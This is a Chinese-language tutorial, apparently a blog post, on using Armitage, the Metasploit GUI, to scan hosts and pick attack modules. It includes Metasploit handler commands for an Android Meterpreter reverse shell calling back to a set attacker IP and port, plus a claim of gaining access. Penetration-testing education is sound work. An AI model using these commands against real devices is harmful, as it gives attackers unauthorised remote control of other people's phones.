Armitage是一款基于Java的Metasploit图形界面化的攻击软件,可以用它结合 Metasploit中已知的exploit来针对主机存在的漏洞自动化攻击。通过命令行的方式使用Metasploit难度较高,需要记忆的命令过多,而Armitage完美的解决了这一问题,用户只需要简单的点击菜单,就可以实现对目标主机的安全测试和攻击。Armitage良好的图形展示界面,使得攻击过程更加直观,用户体验更好。因其操作的简单性,尤其适合Metasploit初学者对目标系统进行安全测试和攻击。
Armitage安装
Armitage的安装很简单,我们只需要执行下面命令即可。
apt-get update
apt-get install -y armitage
运行Armitage
首先初始化msf数据库,执行命令
msfdb init
然后执行命令armitage
启动程序。
登录后界面如下
主机扫描
依次点击Hosts
->Nmap Scan
这里扫描方式有多种,都是基于nmap完成扫描的。当然也可以利用msf进行扫描。
如上,我们扫描到了此设备,点击设备右键
可选择针对此设备的攻击模块。
相关shell操作
这里我们以android shell为列
首先在kali中生成基于android的shell
然后配置终端
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.50.123
set LPORT 443
exploit -j
运行shell后,成功获得权限
可视化的文件管理
总结
armitage将msf命令和结果通过图形化的形式展现出来。方便我们对文件的预览上传和下载。当然也有其缺点,必要msfdb数据库的配置就显得很鸡肋。